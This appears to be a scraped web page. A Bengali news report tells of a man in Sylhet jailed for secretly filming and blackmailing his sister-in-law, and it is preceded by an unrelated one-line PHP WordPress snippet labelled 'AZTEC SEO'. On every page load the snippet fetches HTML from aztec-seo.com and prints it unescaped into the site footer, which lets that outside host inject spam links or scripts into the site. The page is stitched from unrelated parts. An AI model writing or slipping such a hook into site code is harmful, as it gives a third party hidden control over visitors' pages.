/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
সিলেটে শ্যালিকার গোপন ভিডিও ধারণ করে ব্ল্যাকমেইল করার অভিযোগে দুলাভাই রুকন মিয়াকে কারাগারে পাঠানোর নির্দেশ দিয়েছেন আদালত। অভিযুক্ত রুকন মিয়া সিলেটের মোগলাবাজার থানার বীরমঙ্গল গ্রামের বাসিন্দা।
রবিবার আদালত এ আদেশ দেন। এর আগে গত শনিবার বিকেলে গোপন সংবাদের ভিত্তিতে মোগলাবাজার এলাকা থেকে তাকে গ্রেফতার করে র্যাব-৯ এর একটি দল।
মামলার বরাত দিয়ে র্যাব জানায়, রুকন মিয়া গোপন ছবি ও ভিডিও ধারণ করে শ্যালিকাকে ব্ল্যাকমেইল করেছেন। ছবি ও ভিডিও সামাজিক মাধ্যমে ছড়িয়ে দেওয়ার ভয় দেখিয়ে অনৈতিক সম্পর্ক বাধ্য করেন।
একপর্যায়ে ছবি ও ভিডিও সামাজিক মাধ্যমে ছড়িয়ে পড়ায় শ্যালিকা মোগলাবাজার থানায় পর্নোগ্রাফি আইনে মামলা দায়ের করেন। মামলার পর থেকে রুকন মিয়া আত্মগোপনে ছিলেন। পরে একটি দল গোপন সংবাদের ভিত্তিতে শনিবার বিকেলে মোগলাবাজার এলাকা থেকে তাকে গ্রেফতার করে।
র্যাব-৯ এর মিডিয়া অফিসার অতিরিক্ত পুলিশ সুপার কে এম শহিদুল ইসলাম সোহাগ জানান, রুকন মিয়া ভুয়া আইডি ব্যবহার করে অশ্লীল ছবি ও ভিডিও সামাজিক মাধ্যমে ছড়িয়ে দেওয়ায় তাকে গ্রেফতার করা হয়েছে।